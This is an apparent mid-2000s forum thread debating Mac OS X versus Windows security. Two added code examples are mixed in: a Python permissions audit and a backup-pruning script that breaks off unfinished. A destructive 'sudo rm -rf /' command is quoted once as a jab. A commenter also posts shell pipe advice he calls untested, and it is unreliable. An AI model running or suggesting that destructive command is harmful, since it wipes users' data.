I don't think that's a reasonable measure. If the one-fifth of the family's data that got snooped happened to include information providing access to bank accounts, personal financial data, etc., then the damage to the entire family's well being could be ruinous. Is a twelve year old losing her MySpace bookmarks and P2P downloads really no different, to you, than someone having their doctoral thesis or college application essay trashed? Because no, not everyone backs up like they're supposed to, not even the Really Important Stuff.
Don't disappoint your bird dog. Go to the range.
Safer? I guess, except in the past year Apple released more security and exploit fixes for OSX than Microsoft did for WindowsXP...
So again how is it a safer OS if these exploits existed in the first place?
Apple updates its OS more, so it must be less reliable?
This is the logical equivalent of pulling the CarFax report on two cars and deciding against the car that's had all its regularly scheduled maintenance since it must obviously be less reliable than the car that's only been taken to the shop when something broke down.
There's a difference between the things Apple fixes and the things Microsoft fixes.
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
http://www.penny-arcade.com/comic/2002/07/12
I believe Homer Simpson said it best: "It's funny 'cause it's true."
OSX users shouldn't feel invulnerable, just as the article points out. They still need to use hard to guess passwords, and shouldn't just allow any old product to install software (like a music CD) without knowing what gets installed. The feeling of invulnerability itself is a problem, leading to lax security practices.
OSX isn't invulnerable with respect to security - just somewhat decent.
"We are all geniuses when we dream"
- E.M. Cioran
Hear, hear!
So, is there a profile of a Mac virus writer???
Yes, you can usually find traces of red and white fur on his clothing.
That's because he usually sits right between Santa Claus and the Easter Bunny.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
From a design perspective, both Windows and OSX have an innate design flaw that can quickly render a system vulnerable - they encourage and support the wanton installation of third-party software downloaded from un-quarantined, unchecked internet addresses.
We have millions of users taking websites on strictly surface appearances, if lucky by recommendation from a friend or external corporation. Phishing proves this to be totally foolish, yet the culture of seeking and installing applications has not yet wisened up.
A key reason why I'd be very reluctant to use either OSX or Windows on machines that host data I care about, is precisely because they don't offer usable package management (while trying OSX for a few months I attempted to make a go of Fink, but frankly it's unusable).
When I install software on a Debian (Ubuntu, Xandros, Linspire) system (for instance), there's a key exchange, I can check md5sums and I know a large number of people have signed off the package, approving it for download and installation to the best of their knowledge.* This application will also dynamically resource existing Libraries on my machine, as opposed to scattering duplicates all over the place (as is the case with *.dmg and (IIRC)
The day OSX and Windows application developers 'subscribe' their applications to a core pool of packages that is gone over with a fine-tooth comb, is the day that both OS's will be on the road to being safe for general public use.
*Ironic perhaps, that package-management is often cited as an impediment to the uptake of the platform despite being brainlessly easy to use (as is the case with Debian systems). Go figure
When looking at theories stating that if OS X had larger market share than windows we would see many more OS X viruses one might think this is a reasonable assumption. The problem with thinking in this way is that it uses Windows as its case example. With windows as the only data set for comparison there is no evidence to support that with similar market share we would see a dramatic increase of viruses on OS X.
You can definitely argue that there might be more ATTEMPTS at writing more viruses/malware/etc. due to a perceived increase in the target market size, but the differences between windows and OS X are such that you really can't say that because with X product Y happened, so with A product Y will also happen.
Show me ONE...just ONE OS X VIRUS...not UNIX worm, not 10 year old Office VB script, or somebody just writing a shell script with "sudo rm -rf /" and I might listen.
Until I see one in the wild everything else is conjecture.
The most successful worms on Windows have not spread because of OS vulnerabilities. They have spread because users are dumb enough to run executables coming from friends in e-mail and whatnot without checking first. The OS helps make this easier by hiding extensions by default...
There is nothing stopping people from making another sexy-picture-worm that can spread because someone thinks it's a jpg and in fact it's a .app. If it's saved from certain applications before opening there won't even be any warning before they run it and the damage is done.
Which brings up another point. People say OSX is safer because of the user structure, (e.g. getting prompted for a password for root tasks) However most of the damage done by the worst windows worms don't require elevated privileges. As a user-space app you can still destroy or infect all of your documents, access network shares to spread, start services on high ports to spread or make DOS attacks (probably on MS), add startup items and cron jobs to keep yourself running, drop the executable into existing .app packages with user perms (which there are many of in OSX usually because installs don't chown all apps to root, and drag-and-drop installations) to make sure the worm will rise again.
The users need to be smarter for the computing environment to be safe. As the mac community expands, so do the number of dumb people using it, which means crackers can exploit what has always been the biggest hole in computer security --- the operator.
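The point in the comment above about .app packages left with user permissions by drag-and-drop installs can be checked on a given machine. As an added example that is not part of the original thread, this Python audit lists bundle paths that a non-root process could modify; the function name, the `trusted_uids` parameter and the choice of which bundle paths to inspect are assumptions.

```python
import os
import stat


def audit_bundles(apps_dir, trusted_uids=frozenset({0})):
    """List paths inside *.app bundles that an unprivileged process could alter.

    For each bundle directly under apps_dir, inspect the bundle directory,
    Contents, Contents/MacOS and every file in Contents/MacOS. A path is
    reported when its owner is not in trusted_uids (root only, by default) or
    when its mode grants write access to group or other.
    Returns a list of (path, [reasons]) tuples in sorted order.
    """
    findings = []
    for entry in sorted(os.listdir(apps_dir)):
        bundle = os.path.join(apps_dir, entry)
        if not entry.endswith(".app") or not os.path.isdir(bundle):
            continue
        contents = os.path.join(bundle, "Contents")
        macos_dir = os.path.join(contents, "MacOS")
        paths = [bundle, contents, macos_dir]
        if os.path.isdir(macos_dir):
            paths += [os.path.join(macos_dir, name)
                      for name in sorted(os.listdir(macos_dir))]
        for path in paths:
            try:
                st = os.lstat(path)
            except FileNotFoundError:
                continue  # bundle without the usual layout
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits carry no meaning
            reasons = []
            if st.st_uid not in trusted_uids:
                reasons.append("owner uid %d" % st.st_uid)
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    target = "/Applications"
    if os.path.isdir(target):
        for path, reasons in audit_bundles(target):
            print("%s: %s" % (path, ", ".join(reasons)))
```

Bundles the audit reports can be re-owned to root and have group and other write access removed, so that changing them requires the password prompt the comment mentions.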
then what does that make us? (faithful users of gnu/linux)
Meanwhile, there's this other breed of people (who are, strangely, in the minority) who actually do have functioning immune systems. It's true, they still get sick from time to time, and there is even the occasional epidemic, but for the most part, these people can lead normal, productive lives... except for nuisances like the brickbats hurled at them by the hypochondriacs for being "too smug".
1995 called. They want their FUD email back.
;)
Did they say anything about their meme?
"Every Mac user I know can barely turn on their computer, let alone fire up their browser or word-processor..."
...hence my apology to the Warhammer'ers... we should all apologize to each other a bit more. ...BTW, is there a way to filter out posts written by nits under the age of 25? I would turn that option on in a second...
"Mac users are elitists..."
"Macs are designed for non-technical users/grandmas..."
You're all full of crap...
You're just losers who geek out playing Warhammer and spend thousands of dollars 'gaming' on your supposed 'serious-work-oriented-PC"
Dammit... you went and pushed me to that fanatical place... my apologies... It's just that I too have always kept a PC around for the occasional game, a linux box for tinkering, but my Macs have been the workhorses for 20+ years. I just don't think it is a religious war and see no reason to defame any group's preference...
Just open anything you want, give any program password access when it asks, and never even bother with Apple's security updates, they are not needed since they are just busy work to keep their developers happy, since they love the art of coding for a perfect Operating System and a perfect company.
Ironically it's probably true that someone could choose to never install Apple security updates and they would be fine. That's because with 95% of all other macs on earth patched, a potential virus would no longer attempt to use that patched vector for infection - there would be no profit in it.
You have found computing and OS Utopia... *Queue Harp Music*
So here's the deal, a computer user today has two options:
1) No harp music at all, only discordant guitars.
2) Sit in cafe and listen to harp music, knowing that you may have to leave at some point (even though you've been sitting in the same seat for a few years). When you do leave you might have to stand outside the discordant guitar room for a little while.
Assuming you really like harps, and are displeased with discordant guitar works, it's pretty clear which is the smarter option today even if the harp music will not last forever.
I mean, do you not eat a tasty meal because you know when you finish it'll be gone? "What's the point?".
I think I shall have to label you a Security Eeyore.
P.S. - #2 up above can apply to Linux as well as OS X, don't make any assumptions about what I am including vs. excluding.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Oh, sorry, my bad. I guess I should have been more specific and asked for a vulnerability that isn't from 2004. I should have specified, you know, a current one or one that is actually being exploited on more than a handful of machines.
This doesn't have to be a pissing match you know. It's very simple, there are very few exploitable vulnerabilities in OS X as evidenced by the -- probably very close to 0 -- rate of infections of OS X machines. No one is claiming that OS X is invulnerable and that your favorite OS is the "suxors" or whatever it is you kids say. Right now, all evidence points to OS X being a safer OS. But god forbid someone should make that claim without someone coming up with all kinds of reasons why it's not true despite the evidence. Or, how vulnerabilities from two years ago prove OS X is just as vulnerable as Windows.
There's a serious inferiority complex thing going on here. It's sad really. Mac users (if you can make such a broad generalization) aren't nearly as smug as people make them out to be. All of the Mac users I know are security-conscious. They have no illusions about the potential security dangers though they know that OS X is more secure than Windows. Somehow this is interpreted as smugness and having your head in the sand. Go figure.
...Is don't talk about Mac security. Sheesh.
Opener isn't a virus. It doesn't self-multiply... What Opener is, it's a rootkit. A program you use as a hacker to cover up that you've hacked into the machine. To use it, you have to gain access to the computer somehow BEFOREHAND. A rootkit basically is useless unless you already have root (or at least user) access to the machine in question. The other source only mentions an exploit. No one has said that there aren't exploits for Mac OS X. Only that none has been used to develop viruses. If security indeed is very important (read: secret information, research, webservers etc), an exploit is a very probable vector of infection, and shouldn't be ignored. Unpatched exploits are what hackers use to gain access. In a home setting, the risk of getting targeted attacks is lesser. Basically, the only interesting use of the average home system is as some kind of a botnet. That means hackers are less probable to hack a home system "manually" and instead use viruses, trojans, spyware etcetera. Also, the automated versions often work better in settings where the user has a firewall (think WMF exploit!). If no ports are opened for services, it doesn't really matter if there is a barn-size hole in the service, as you can't access it remotely anyway.
I have a really elegant proof for Fermat's last theorem. If this sig was only a bit longer...
Yes, because as we all know the really valuable data on the computer is the OS and installed programs. You know, the stuff that can be replaced in a few hours.
.Mac subscription includes backup programs, and automatic syncing of a number of things like email and keychains and application preferences and other user-defined documents to an Apple server, in case the worst happens.
All that user data that's completely and utterly irreplaceable? Worthless. Who cares if a virus or trojan destroys it? And it obviously doesn't matter if a keylogger running in userspace sniffs out all your bank passwords and sends them to a 3rd party (what, you don't need admin privs to open a socket?!?!), because, hey, the OS itself is still secure!
Actually part of the
But really, what modern viruses actually delete user data? They are far more interested now in capturing user data, or better yet claiming that computer as a zombie. It's simply far more profitable. The idea of viruses actually going after user data is as outmoded as the story submission itself.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
My brother has an older iMac with five user accounts on it, so if one user gets a virus then only 20% of the user data is at immediate risk
The permission system on OS X is quite loose. By default, users can write directly to the Applications directory. That means that malware could easily trojan common programs like iTunes and so on.
So, if a virus somehow got onto the average Mac, I don't see the user account system being any more than trivial protection.
Whenever I hear the word 'Innovation', I reach for my pistol.
So now that everyone's figured out that the article is from 6 years ago, 2000, can we agree that there still hasn't been a successful self-propagating virus for Mac OS X?
I think we can. Let's hope for another 6 years.
Getting OT..
I pulled a similar trick..
We had a guy in our loose-knit Linux user group who was kind of a jackass. He had a few friends that were the same. One night I was bored so I connected to his mail server on his Linux box and sent an email from root@localhost to root@localhost with a body of "Ha, got your password!".
Well I was honestly thinking he would have figured it out as the headers and logs would show the originating ip but apparently the obvious was overlooked. At the next meeting, he connected to and discussed the machine and his group of guys and himself basically concluded the machine was owned and rooted and no one could trust any of the binaries or logs on the system. This was after several other people including myself asked about the headers and the logs but we were brushed off. After it got that far I felt it had reached the point of no return and there was no way in hell I was going to speak up and tell them it was a joke. He wiped out his machine.
"in other words, any major OS made by any company other than Microsoft."
True, any OS connected to a network is going to be susceptible. The point in the article wasn't about the Mac OS, it was about the user.
I think the majority of Linux users are well aware of security issues. Every week when I update my packages, at least 90% of updates are security related. I am regularly reminded my system is not immune.
(The majority of) Linux users say they are more secure than Windows, but they don't say they are immune to attack. The point the author was making is that the majority of Mac users think they are safe.
He was singling out the users, not the OS.
----- If communism is a system where the government owns business, what do you call a system where business owns govern
I have 4 machines at home, a Windows XP laptop, a Windows 2003 "desktop", an Ubuntu Linux desktop and an iBook. I also have a Linksys router, and I haven't got a virus, a trojan or whatever on any of the machines yet. Now, I used to have Windows 2k and I got Blaster, once, and the now Windows 2003 "desktop" used to have 2k as well and had a blocked trojan (was there but couldn't connect out) when it was my girlfriend who was taking care of it. I don't consider myself lucky; there are a few steps to keep yourself secure, as far as possible, because nobody is immune to system bugs. Now, I just do things in order: first I install the OS, then activate a firewall, and then start to update from a trusted place (Windows Update, Apple, or the Ubuntu repositories). All the machines are connected to the Internet from the beginning, because I think that in most cases my router will protect me; if I didn't have it, I would not connect them before the firewall is on. After that, I install an antivirus, usually Clam, but lately I tried Norton thanks to Google Pack, and it seems to work fine. From then on it is just a matter of auto-updating and scanning whatever you download. It is not 100% protection since an exploit is always around the corner, but I think it is as close as I can get without compromising the ease of use. Just to be clear, I use the integrated firewall in Windows and Mac OS and Firestarter in Linux. Bonus: with multiplatform, if one catches a cold, the other can do the doctor.
developed .NET apps
I hear they have shots for that now - I hope your case cleared up quick.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
if Macs are 5% of the computer market, why aren't 5% of the viruses and spyware on Macs?
Couldn't it be because before the transition to Intel chips the script kiddies and viri writers would have to compile and write their code for the PPC chip? This would be in addition to the effort of finding an exploit to take advantage of in OS X.
Could we be looking at an increase in probes and attacks to OS X as a result of this change to Intel chips? I don't foresee it as happening but time will tell
http://www.zdnetindia.com/insight/commentary/stories/132034.html
Great, opens up a remotely exploitable hole that could take over your OS...
How about a OSS based solution that is...FREE?
http://www.markallan.co.uk/clamXav/#free
Peer reviewed and effective, go figure.
Remember though, AV definitions will lag a major virus infection by hours to days (maybe even longer) and if you're the first one infected, well, it's too late for you anyways right? There is no substitute for safe/sane User paranoia.
- Keep your System Up to date.
- Keep regular, up to date back ups of your data.
- Many of those lame free pr0n/warez sites make $$ by trying to co-opt you so why would you go to those sketchy web sites at all? It's like asking for it. Get your prOn for free from newsgroups like the smart guys do...
- Don't run any old program downloaded from any old sketchy source like some dumb ass.
- Grow up and quit using pirated shit/warez. The fact that you'll get rooted one day is the inevitable Karma fall out.
DaveC
There are no stupid questions...just stupid people.
You think a Mac user would have the skills for a network attack? ;-)
If more than one mouse button is too confusing, how are they going to launch a network attack?
----- If communism is a system where the government owns business, what do you call a system where business owns govern
1) Outlook's built-in ability to read an email and automatically run its attachment is the sole reason why virii are a problem.
2) IE's Active X controls, with the ability to download and run a program without user knowledge by simply surfing to a website, is the sole reason spyware and adware are such huge problems.
Last I looked, only Windows has these problems. Yeah, Outlook's on the Mac, but it's not widespread and the virus attachments seem to be written for Windows. Also, many Mac users may not use Outlook.
If I'm wrong, someone please tell me. And while you're at it, please tell me why the Outlook problem exists. Are there really that many users who need their attachments to execute when they read the body of an email? Why can't you turn that shit off?
Let's cut to the chase and provide URLs to FREEWARE every Mac user should have on hand to combat the ***still mythical*** malware that is going to bring DOOM to the Macintosh:
1) ClamXav: http://www.markallan.co.uk/clamXav/ It's OpenSource, it's updated regularly, it's free. So use it already. I regularly receive Windows malware from email or web sites. Rather than possibly pass them on to my Windows using friends, I zap them by checking my Users account folder regularly.
2) Paranoid Android: http://www.unsanity.com/haxies/pa It's OpenSource, it's free. It was originally created to patch a doorway malware could use to attack Mac OS X. That doorway was mostly closed in Apple's 'Security Update 2004-06-07'. But the fact is that Paranoid Android goes way beyond that patch and stops any potentially evil process dead in its tracks. Some people may find it too intrusive, making you verify every little process. But I LOVE IT! I have it on full steam all the time. There ain't no malware gonna get me! It literally runs rings around the MOSX-catch-up security being put into Windows Vista, and is also far more secure than what Mac OS X alone provides.
Now some personal comments:
- I subscribe to the 'Cry Wolf' theory: The more that certain people, well intentioned as they might be, whine and carry on about how the Mac is DOOMED because of this and that, the less people listen. So when the BIG ONE really does come, they are less prepared. It really was an excellent idea to totally ignore Symantec when they lectured the Mac community, two months in a row, that they were DOOMED if they did not buy Norton Anti-virus. It turns out that NAV has itself got a major security hole, and potentially does some MAJOR damage to your OS. NO ONE should buy or run NAV. NO ONE. It is itself nearly as dangerous as malware! Irony. Then there was the attempt by the SANS Institute to perpetrate FUD against MOSX. http://macdailynews.com/index.php/weblog/comments/7725/ I personally wrote to the editor of the article and discovered in his reply he had no justification for his DOOM hypothesis beyond a hacker using a nasty AppleScript that would have to be planted via sneaking them onto an insecure Mac workstation. Duh! Any idiot knows that is possible! Only a dolt doesn't lock down their machine when they walk away from it. The guy was crying wolf.
- Then there is the 'Mac users are SMUG' crap. Bite me! What are smug are the Windows users constantly trying to justify their purchases by way of attacking the opposition, namely Macintosh purchasers. Hey Windows users: You have over 15,000 pieces of malware out there in the wild that want to ruin your computer. Deal with it. Thank Microsoft, the authors of your fate. Mac OS X has NO malware at all. Deal with it. Thank the authors of FreeBSD, NeXTstep, Darwin and Mac OS X, who have kept security in the forefront of OS development, where it belongs.
- As an avid listener to the GREAT podcast 'SECURITY NOW!' http://grc.com/securitynow.htm I am intrigued at all the ways there are to hack a computer either directly or via malware. I am also in shock at just how poor Windows security really is, and amazed at how relatively brilliant Mac OS X security really is. Nonetheless, Mac OS X security IS NOT PERFECT! So I stay on my toes, stay prepared, and make sure doorways to potential hackers are as closed as possible. Listen to this GREAT show and you will learn how. I gave you two kewl keys above to get you started. Use ClamXav and Paranoid Android, for FREE! and tell the 'You're So Smug!' rectal pores to shut the hell up and worry about their own multitudinous security problems.
Totally thrashed my C=64, you damn hacker!!!!
I was doing so good, too. Almost 15 years virus-free, and you hooligans have to screw it all up.
jred
I'm not a mechanic but I play one in my garage...
you'd been running OS X since 10.0.0 with absolutely no security issues occurring at all. Mac OS X is damn secure. deal with it.
Yep, Mac OS X can be hit with a Trojan, not a big surprise there. Symantec has some info on this 'MP3Concept Trojan Horse', which is benign. It does use a neat trick to embed the code in an MP3, but other than that it isn't that special. Tricking someone to run your program isn't really something that we will ever make impossible under every circumstance, but I will admit that using filename extensions to identify file types is one very stupid thing that Mac OS X copied from Windows, and then hiding them by default only compounds the stupidity.
Exploit, infections from not known: http://www.macintouch.com/opener.html
But "opener" requires a previously compromised system. A "rootkit" without a viable delivery mechanism isn't really a "virus" or "worm" or even a "trojan". According to McAfee: "This threat does not make use of an exploit, so to have the script run successfully on a system and make changes, the user account from which the script is run must have sufficient rights. If no superuser/root/admin access is available many of the subroutines will fail and generate errors." I don't know why McAfee classifies it as a virus/worm since it doesn't seem to have any propagation abilities.
In Wild exploit, known infections: http://news.zdnet.co.uk/internet/security/0,39020375,39155837,00.htm
True, the exploit mentioned is a tricky thing (potentially allowing code that was downloaded to be run as trusted), however I don't know if any was ever found in the wild - and even then it would still require an administrator's password to do system damage. The "hole" was supposedly patched by Apple's Security Update 2004-06-07 according to Unsanity who had released a little application to guard against the exploit.
If those are the only ones you've found, you haven't really shown any "exploit[s] for a Mac OS X vulnerability", although the MP3Concept Trojan I guess uses some "social hacking" types of tricks that would also work in Windows by hiding that it is an application rather than an mp3 file. Even if we accept a count of 3 (or ten or twenty), Mac OS X would still be comparatively malware-free.
Though there is some merit due to the fact that no computer or OS is ever completely safe, the Mac is vastly safer than Windows and it certainly isn't because Macs are so outrageously rare that no unscrupulous hackers own one and it also isn't because unscrupulous hackers are so noble that their honor prevents them from writing malware for the Mac. If you believe that, you are deluded. (Of course if you are right then it's all the more reason to buy a Mac!)
So why haven't Macs seen their fair share of malware?
It is because the OS is simply more secure by design. Are there flaws in that design? Of course there are. But I think the reason is more non-technical.
Just try to run and administer a Windows box securely. It's extremely hard to do. A knowledgeable security person can do it with a great deal of effort -- but the average home consumer sure can't. You'll also rapidly discover that not all, but a substantial quantity of Windows software is written with the assumption that applications are installed by the same users who will be running them or that all users have administrative rights all the time. The Windows developer community has this flawed mentality and the OS paradigm does very little to enforce a more secure model.
Mac OS X, in contrast, has a completely different security and usage paradigm. Use a Mac and you'll quickly discover that the OS assumes that the OS should live in one part of the filesystem, installed apps in another, and users should only modify files that are found in their home directories -- further, no user is an admin. Even administrative users run unprivileged and have to type their password to perform administrative actions. Developers with any experience on a Mac quickly learn this paradigm. There are exceptions and I have found them, but they are uncommon on the Mac whereas they are quite common on Windows.
There are so many technical reasons why the Mac is more secure, but the underlying non-technical reason is because (a) developers and users alike are basically lazy and will follow the path of least resistance and (b) the path of least resistance on Windows is to not bother with security at all whereas the path of least resistance on the Mac is to actually have a more secure installation... the OS & its tools actually make doing this seem quite natural.
Bottom line: The average non-technical Windows user really cannot maintain a secure machine and Microsoft's OS paradigm does little to encourage secure development practices. The average non-technical Mac user actually can maintain a fairly secure machine without really knowing what they're doing... and that's because the OS makes it easy for both the users and the developers to have good security habits.
Mac users should be a little paranoid, but the OS is vastly more secure. While we'll probably get a small number of malware problems, it'll never come close to approaching the scale of security problems enjoyed by Windows users.
This article is what happens when someone gets so carried away with general principles that they lose touch with observed reality.
I'm a Mac user. I know that any OS can be cracked with sufficient effort. I know that viruses, trojans, and malware are a risk, in the general, theoretical sense. I also know that the number of actual, observed OSX exploits has been very low for a good long time.
I don't assume OSX's security is perfect, but I do know that it has a history of being pretty darned good. I know that Apple has built two or three layers of security into OSX (unix access controls and best practices, easy automated patching, and GUI-level alerts like, "The file you're downloading contains a program, are you sure you want it?" and "This program is trying to launch for the first time, do you want it to?"), and history suggests that their strategy works.
I also know that most security software breaks down into two basic feature sets: one set maintains a collection of best practices, access controls, and patch automation that keeps machines from getting infected in the first place, and the other set scans for known viruses to catch anything that got past the 'prevention' layer.
Well, the 'prevention' stuff is already built into OSX, and since there are no known viruses for OSX currently in the wild, installing a signature checker would be a waste of time. And once again, history suggests that Apple's prevention strategy seems to be working pretty well.
If you want to talk about improving a Mac's security, don't just wave the "Oooh, it's coming.. booga booga" FUD-stick in my face. Show me how the current set of OSX tools and policies can be beaten, or show me some other set of tools or policies that have a better track-record at preventing infection. As of today, the risk of getting a virus under OSX is significantly lower than the risk of getting hit with a Windows virus before the AV vendors publish a signature that will catch it.
Right now, my observed risk of infection is practically nil. Right now, OSX's default security policies give better results than anything in the Windows market. Right now, I don't know of any products that will lower my risk of infection so much further that they'll be worth the time, money, effort, or computing resources I'd devote to them.
And I remain steadfastly unimpressed by abstract "if you think your security is good enough, it isn't good enough" lines of reasoning. Every security policy accepts some level of risk. Every security policy ends up saying, "well, I guess that's good enough," somewhere. If you don't like where I've drawn the line, show me a better place to draw it, and show me that doing so will be cost-effective in some way. If you can't, I'm gonna call FUD.
I've been doing computer stuff for 20 years now so I won't go into technical details. Just this little comparison:
1. Installation of system wide software on Windows:
Doubleclick install.exe.
Wait.
Reboot when prompted.
2. Installation of system wide software on Linux
(KDE, but works with any other Desktop):
Click install.bin. No reaction.
Open CLI, run ./install.bin to read reaction. Notice lack of execution rights due to INet download. Change rights in context menu. Click install.bin. No reaction.
Type ./install.bin to read reaction. Notice user permission problem.
Switch to su.
Run install.bin.
Wait.
Exit su upon prompt.
3. Installation of system wide software on Mac OS X (Tiger)
Get prompted upon download with something like "This may be a program, do you really want to download it?"
Confirm.
Doubleclick the installer.
Get prompted about su access requirement.
Confirm continue.
Enter su password in neat OS X su permission popup.
Wait.
Click away finish message.
Do you see any pattern?
(Hint: Number 2 and 3 are similar)
Personally, I think of OS X as a unix variant with minimum hassle, zero hardware compatibility issues and some nice extras such as neat looking cigar box cases and an interesting range of commercial software offerings. It plain lacks the PC hardware and driver crappiness.
That's why I ditched Linux as main working OS after 3 years of sole professional Linux usage.
The bitter truth is, security wise Windows isn't even in the same ballpark as the entire unix lot. It's a gaming BIOS with severe security issues due to a substantial inert insecure-by-design problem. Vista will probably change this (they have to), but until today Windows and its standards of usage are nearly a decade behind in basic security.
Bottom line:
When it comes to security, Mac OS X is - simply put - Debian Linux or OpenBSD without the PITA factor.
We suffer more in our imagination than in reality. - Seneca
That might seem incredibly naive, but I don't see any reason why I should trust an OS vendor that basically says I have to buy someone else's software because he's not able to write secure code.
Maybe basic security measures are useful anyway, like the use of a firewall, but my OS doesn't open dozens of ports without my knowing...
The biggest security flaw, in my opinion, is the guy who opens emails titled "I'm a gorgeous girl and I want to have sex with you..."
Cats are intended to teach us that not everything in nature has a function.
doesn't ClamAV work on Mac? I really don't know. but I would think it's close enough to UNIX that it would.
Windows Vista (with the NT Core) will also bring the root/admin abstraction to the Windows World. MS should have done this with Windows XP, but instead chose compatibility for older applications. MS truly isn't stupid about security, nor is Windows. But Windows has to do something OSX doesn't. It has to support a staggering amount of hardware configurations (without conflicts), and a staggering amount of third party software, and then add in that it is the most targeted Operating System for hackers.
That's bullshit, and you know it. Are you really saying that Windows runs on more hardware configurations and architectures than any flavor of BSD? Are you really saying that poor, poor Microsoft has to bend over for manufacturers who build crappy products and write bad drivers? Are you really saying that OS X has a monolithic plain-vanilla BSD kernel?
Because the answer to those three questions is "No!".
Grr...nVIR.
That's the most costly virus I have ever encountered on the Mac. At the time, I was working furiously on my Mac SE, writing a primitive GIS (geographic information system) as an alternative to the usual, mundane term paper. I couldn't get the thing to stop crashing and wound up submitting the program a week late. I had to settle for a B instead of an A, and it turned out the crashing was caused, not by bad coding or Think C bugs as I had assumed, but by the nVIR virus. A quick run of Disinfectant and all was well, except for my marks...
Actually, though, this raises an interesting point. Macs have always had a lesser market share than PCs; yet there were a number of virii for the Mac back then. I remember another one (WDEF?) which kept bouncing around from machine to machine via infected floppies. While the virus problem seemed to get steadily worse on the PC, however, it got better on the Mac to the point that they seemed to vanish altogether by the time OS X was rolled out. Hmm...
Like all technical journalists, Bill is obliged to put the 'Security through Obscurity' myth into every article that refers to the absence of viruses on OS X.
It's rather inconvenient for him that at the same time, Microsoft released a security patch for Vista.
Yep - it's not out yet and they're already patching serious security issues.
So let's see. OS X has how many users ? Vista has how many users ?
Vista is massively more obscure than OS X, yet it's already needing urgent patching.
Obscurity AND insecurity is a new concept. How do they explain that ?
For example, if I want to run a relatively common application such as Quick Books, the user I run this package as must have admin rights while 9x users need not worry because all users have those rights.
The point being that, while you're correct that the NT kernel has quite a bit of security design, you neglect that Microsoft and its third party vendors have largely nullified the same security by not enforcing good security practices in the applications they release.
We all know it: Market share and insecurity are directly related, because hackers go for market share. That's why Apache is such an exploit ridden piece of crap and IIS is known for its remarkable security. ...
Oh, errrm, wait
We suffer more in our imagination than in reality. - Seneca
I used to be kinda smug, and security was one of my key points when switching to OS X instead of Windows. I follow common sense rules, and have my machine pretty much locked down. One evening a friend brought over his Windows laptop and connected to the network. Upon connecting, his firewall told him that a trojan was trying to access his computer. Being that there were only two computers on the network (his Windows laptop and my PowerBook) I (wrongly) assumed his firewall was misinterpreting my PowerBook's attempts to look for shares on his computer. Well, after he left I went and downloaded ClamAV and did a scan. Sure enough, it found a trojan of some sort sitting on my hard drive. Ever since then, I run a scan once a week, just to be on the safe side. Anything can happen to anyone no matter how cautious you are. Granted I do play around on usenet a lot, so it wasn't totally shocking to me that I would eventually end up finding something.
I think as long as other Mac users don't become complacent, the Mac community as a whole will be more secure, regardless of their knowledge/experience with computers.
I'd say only fanboys say Linux is secure. Most Linux users, myself included, wouldn't.
I run my updater every week. I'd say about 90%+ of the updates are security related.
Is my system more secure than windows? probably
Do I think my system *is* secure? no
----- If communism is a system where the government owns business, what do you call a system where business owns govern
My passion for my Mac is greater than my passion for living.
Somehow I erased part of my last sentence or maybe my thought train strayed - I do weekly backups of the /Users drive and monthly dd backups of the entire disk. It also cleans up the backups when disk space is low (I only keep one monthly around), so I hope I never get a long term infection ;)
If anyone's interested, the crontab entry fragment I use looks like this (minus my bash shell script for cleanup):
# cron turns an unescaped % into a newline, so each % in the date format is written as \%
00 3 * * 0 tar cvfj /Volumes/backup/Users`date +\%d\%m\%y` /Users &>/var/log/backup`date +\%d\%m\%y`
30 3 1 * * dd if=/dev/rdisk0 of=/Volumes/backup/complete`date +\%d\%m\%y` bs=524288 count=3000 &>/var/log/complete`date +\%d\%m\%y`
That is a simple text file created using any text editor. The numbers mean, in order, minute, hour, day of month, month of year, day of the week, with * being a wildcard (any match). It's also possible to do a range, like 1-5 if you want Monday-Friday on the day of the week parameter (0=Sunday, 6=Saturday). Use man crontab for more info. You install it with sudo crontab yourtextfilename from a command line if you want it to record as root (otherwise it crons as your username and if your user files get wiped out, your backup will as well).
Note that I have a second hard disk called 'backup' and it is owned by root. Currently it does not compress the dd files but I suspect you can do this by adding something like this to the dd line:
| xargs tar xvfj complete`date +\%d\%m\%y`.tar.bz2
and probably also
;rm -rf complete`date +\%d\%m\%y` to remove the uncompressed file at the end. Maybe even an &>/dev/null
I haven't tried the above yet, so I'm speculating.
also, I probably will get rid of the bash script and replace it with an entry that sorts and finds the oldest but I want to do this without a temp file, which is what I'm doing now (and using sort).
make that | xargs tar cvfj complete`date +%d%m%y`.tar.bz2
ever have one of those days?
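A cleanup step of the kind the posts above mention, as an added example that is not the poster's own script: it keeps the newest N archives using only the shell's sorted glob expansion, so it needs no temp file and no sort. It assumes archive names carry a %Y%m%d stamp rather than the %d%m%y used in the posts (day-first stamps do not sort chronologically); prune_backups, the script path and the file names are hypothetical.

```shell
#!/bin/sh
# Added example, not the script from the posts above.
# ASSUMPTION: archives are named PREFIX<YYYYMMDD>[suffix], for example
# Users20060115.tar.bz2, so that name order equals date order.
#
# Hypothetical root crontab entries. Inside a crontab an unescaped % ends
# the command, so it has to be written as \% there:
#   00 3 * * 0 tar cjf /Volumes/backup/Users$(date +\%Y\%m\%d).tar.bz2 /Users
#   30 3 * * 0 /usr/local/sbin/prune-backups.sh /Volumes/backup Users 4

# prune_backups DIR PREFIX KEEP
# Deletes the oldest PREFIX<YYYYMMDD>* files in DIR until only KEEP remain
# and prints how many files were deleted.
prune_backups() {
    dir=$1
    prefix=$2
    keep=$3

    # KEEP must be a positive decimal integer; 0 would delete every backup.
    case $keep in
        '' | 0* | *[!0-9]*)
            echo "prune_backups: KEEP must be a positive integer" >&2
            return 1
            ;;
    esac

    # The job runs as root, so refuse a missing or symlinked directory:
    # a symlink planted at that path would redirect the deletions.
    if [ ! -d "$dir" ] || [ -L "$dir" ]; then
        echo "prune_backups: $dir is not a real directory" >&2
        return 1
    fi

    # Pathname expansion returns matches in sorted order, oldest stamp
    # first. Loading them into the positional parameters replaces both the
    # temp file and the call to sort.
    set -- "$dir/$prefix"[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]*
    if [ ! -e "$1" ]; then
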